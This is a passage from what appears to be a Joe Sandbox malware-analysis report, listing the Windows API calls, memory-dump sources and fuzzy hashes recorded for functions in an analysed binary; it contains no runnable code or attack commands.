                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        • Opcode ID: 25bab2c378d8ccdca42302b529b7226dbcb53e132c8b79d72fba7b53dadd09a9
                                                                                                                        • Instruction ID: 10762bae306b5deee2c961a6b1ec9c70942e15eddc1f5eb5ba780e1d02d681b4
                                                                                                                        • Opcode Fuzzy Hash: 25bab2c378d8ccdca42302b529b7226dbcb53e132c8b79d72fba7b53dadd09a9
                                                                                                                        • Instruction Fuzzy Hash: 8D1181B115021DBEEB154F65CC85EE77F5DEF08798F028115FA08A6090C6729C21DBA0
                                                                                                                        APIs
                                                                                                                        • __getptd_noexit.LIBCMT ref: 00DB4C3E
                                                                                                                          • Part of subcall function 00DB86B5: GetLastError.KERNEL32(?,00DB0127,00DB88A3,00DB4673,?,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB86B7
                                                                                                                          • Part of subcall function 00DB86B5: __calloc_crt.LIBCMT ref: 00DB86D8
                                                                                                                          • Part of subcall function 00DB86B5: GetCurrentThreadId.KERNEL32 ref: 00DB8701
                                                                                                                          • Part of subcall function 00DB86B5: SetLastError.KERNEL32(00000000,00DB0127,00DB88A3,00DB4673,?,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB8719
                                                                                                                        • CloseHandle.KERNEL32(?,?,00DB4C1D), ref: 00DB4C52
                                                                                                                        • __freeptd.LIBCMT ref: 00DB4C59
                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,00DB4C1D), ref: 00DB4C61
                                                                                                                        • GetLastError.KERNEL32(?,?,00DB4C1D), ref: 00DB4C91
                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,00DB4C1D), ref: 00DB4C98
                                                                                                                        • __freefls@4.LIBCMT ref: 00DB4CB4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445074172-0
                                                                                                                        • Opcode ID: 58e4f99817fca7ea0b13391f67a90662ae7e3e6ca1fffac3560c6896ae43cdfa
                                                                                                                        • Instruction ID: 3e0ba11a791b0db6afc9e0f782f1e0f9a2c5b97831fa7691ea61d66e4a13363c
                                                                                                                        • Opcode Fuzzy Hash: 58e4f99817fca7ea0b13391f67a90662ae7e3e6ca1fffac3560c6896ae43cdfa
                                                                                                                        • Instruction Fuzzy Hash: D401B870801601EFC729BFB4D90A9CE7BE9EF04714B148518F91B9B252EF34D846DAB1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DFE14D
                                                                                                                        • _memset.LIBCMT ref: 00DFE15C
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E53EE0,00E53F24), ref: 00DFE18B
                                                                                                                        • CloseHandle.KERNEL32 ref: 00DFE19D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                        • String ID: $?$>
                                                                                                                        • API String ID: 3277943733-2278415509
                                                                                                                        • Opcode ID: 206100d6fb187b2b0a5cebb223e9bc612acfd55b0e1342bbbfbc507b586ac13b
                                                                                                                        • Instruction ID: a412e20e35b9855446a252dbb3813e44a97702af9c9e1b63e8bc5367416824d4
                                                                                                                        • Opcode Fuzzy Hash: 206100d6fb187b2b0a5cebb223e9bc612acfd55b0e1342bbbfbc507b586ac13b
                                                                                                                        • Instruction Fuzzy Hash: 44F09AB1A40300BFF2105B32AC06FF77AACDB09396F004821BA14E51A2D7B68E1886B4
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00DAC6C0
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DAC701
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00DAC729
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00DAC856
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DAC86F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1296646539-0
                                                                                                                        • Opcode ID: 1d87da7a2dd18ba32b102baf8e65b5fa55fc019dfb28bcf601282c5caeb19c1b
                                                                                                                        • Instruction ID: 026ba5bbfdbb3f72f177f6a8c0953b098b402278c561214a5679c5f0da655c92
                                                                                                                        • Opcode Fuzzy Hash: 1d87da7a2dd18ba32b102baf8e65b5fa55fc019dfb28bcf601282c5caeb19c1b
                                                                                                                        • Instruction Fuzzy Hash: 99B14B79A1024ADBDF10CFA8C5807EDB7B1FF09314F14A52AEC99EB254DB34A940CB64
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3253778849-0
                                                                                                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                        • Instruction ID: cebe297ca6d7652851d80c1c98b401525eaeab52d9bc76f21afde7e16b886a47
                                                                                                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                        • Instruction Fuzzy Hash: D261AB3161020AABCF01EF64CC92EFE77A9EF05318F04455AF85A6B292EB35D905CB71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                          • Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2FA0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF2FE0
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DF3003
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DF302C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DF306F
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00DF307C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4046560759-0
                                                                                                                        • Opcode ID: ab6ab9c591720cc063adac8990f6700d84e22ff71b689ce470178da1e3311b9c
                                                                                                                        • Instruction ID: 302c7f90f0456db621a8d4b7769378dc5a1a199770044fa681a302e01558a547
                                                                                                                        • Opcode Fuzzy Hash: ab6ab9c591720cc063adac8990f6700d84e22ff71b689ce470178da1e3311b9c
                                                                                                                        • Instruction Fuzzy Hash: C7514B31118204AFCB04EF65C885E6AB7E9FF88714F05891EF685972A1DB71EA05CB72
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2037614760-0
                                                                                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                        • Instruction ID: 97d2fb57b05e886a2bda75f9e6d54524444b6a5d5fff52312685583d7c4a162e
                                                                                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                        • Instruction Fuzzy Hash: F0511931900215AECF11AF98C4419FDB7B2FF0A720F98404AF582A7591DB749F82D7B1
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DD2AF6
                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00DD2B68
                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00DD2BC3
                                                                                                                        • _memmove.LIBCMT ref: 00DD2BED
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00DD2C3A
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD2C68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1101466143-0
                                                                                                                        • Opcode ID: ceb6b7582adcc6e0999e4078ece06be98d5532492dca4a7ac08ea19b2a911d79
                                                                                                                        • Instruction ID: b4607290b3881a78ddf7fe95b20f10b567b0628541b5fd175a4c6f9beeebf264
                                                                                                                        • Opcode Fuzzy Hash: ceb6b7582adcc6e0999e4078ece06be98d5532492dca4a7ac08ea19b2a911d79
                                                                                                                        • Instruction Fuzzy Hash: 5B517EB5A00209EFDB14CF58C880AAAB7F8FF5C314B15855AE959DB314D734E951CFA0
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 00DF833D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00DF8374
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DF839C
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00DF840B
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00DF8419
                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00DF846A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 650687236-0
                                                                                                                        • Opcode ID: 9498512fa7f2d811740a986470c7452d445700c79038876eef1659e9426887d8
                                                                                                                        • Instruction ID: 990c4d8f3446184b9372373082bf7f15b84691333d66fa273ef7a79cf9fc5833
                                                                                                                        • Opcode Fuzzy Hash: 9498512fa7f2d811740a986470c7452d445700c79038876eef1659e9426887d8
                                                                                                                        • Instruction Fuzzy Hash: E9518B35A00219EFCF01EFA4C941AAEB7F5EF48710F158459E916BB351DB30AE419BB1
                                                                                                                        APIs
                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DE9409
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE9416
                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DE943A
                                                                                                                        • _strlen.LIBCMT ref: 00DE9484
                                                                                                                        • _memmove.LIBCMT ref: 00DE94CA
                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00DE94F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2795762555-0
                                                                                                                        • Opcode ID: b7cce27b45256bc419fef7005c09d44c9d95a1f0734eabf6f3b8a40957635bbb
                                                                                                                        • Instruction ID: f5ade8d49395d8410894eefb7f1cbf83271cc16a46ba52fe07ff6fb9baffb54f
                                                                                                                        • Opcode Fuzzy Hash: b7cce27b45256bc419fef7005c09d44c9d95a1f0734eabf6f3b8a40957635bbb
                                                                                                                        • Instruction Fuzzy Hash: DD416F71500104AFCB14EBA5CC95EEEB7B9EF48310F10816AF516972D1DB30AE05CB70
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DD552E
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD5579
                                                                                                                        • IsMenu.USER32(00000000), ref: 00DD5599
                                                                                                                        • CreatePopupMenu.USER32 ref: 00DD55CD
                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00DD562B
                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DD565C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3311875123-0
                                                                                                                        • Opcode ID: 694f70c96415db13dda44a54735be019a907a7c1e68ba95d50374d7021eafafd
                                                                                                                        • Instruction ID: 6d72f2d504b074dcdde9a52ad3ab714c49f07fc82f823588704cd2ec2c85d782
                                                                                                                        • Opcode Fuzzy Hash: 694f70c96415db13dda44a54735be019a907a7c1e68ba95d50374d7021eafafd
                                                                                                                        • Instruction Fuzzy Hash: A051CE70600A46EFDF21CF68E888BADBBF5EF05318F58411AE4569A398D370D944CB71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DAB1C1
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DAB225
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00DAB242
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DAB253
                                                                                                                        • EndPaint.USER32(?,?), ref: 00DAB29D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1827037458-0
                                                                                                                        • Opcode ID: f327e49299082f51282e12d86695d6b134a7ab7d5da98f43f6a37368e29e259d
                                                                                                                        • Instruction ID: 221d7bf20856f5d154d0c1803a6ff8dfae3341c9a500848c0dc30bd88eb15fe8
                                                                                                                        • Opcode Fuzzy Hash: f327e49299082f51282e12d86695d6b134a7ab7d5da98f43f6a37368e29e259d
                                                                                                                        • Instruction Fuzzy Hash: C4418D71104300AFC721DF25DC84BBA7BE8EB4A735F14066AFA95962A2C7319C4A9B71
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00E51810,00000000,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE21B
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00DFE23F
                                                                                                                        • ShowWindow.USER32(00E51810,00000000,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE29F
                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00E51810,00E51810,?,00E0E2D6), ref: 00DFE2B1
                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00DFE2D5
                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DFE2F8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 642888154-0
                                                                                                                        • Opcode ID: 4083c71f12153822d17fd62dbbaeaa50a6a1de720fd2be7b170e7cf1ca8de628
                                                                                                                        • Instruction ID: 1530d4078bae16fe310ba45c8cdb562e09b09bf5fa33ae9d71b30e06600da149
                                                                                                                        • Opcode Fuzzy Hash: 4083c71f12153822d17fd62dbbaeaa50a6a1de720fd2be7b170e7cf1ca8de628
                                                                                                                        • Instruction Fuzzy Hash: 1F415E30605148EFDB26CF14C899BA47BE5BB06304F1D82B9EB589F2B2D731A845CB65
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
                                                                                                                          • Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB5FA
                                                                                                                          • Part of subcall function 00DAB58B: BeginPath.GDI32(?), ref: 00DAB611
                                                                                                                          • Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB63B
                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DFE9F2
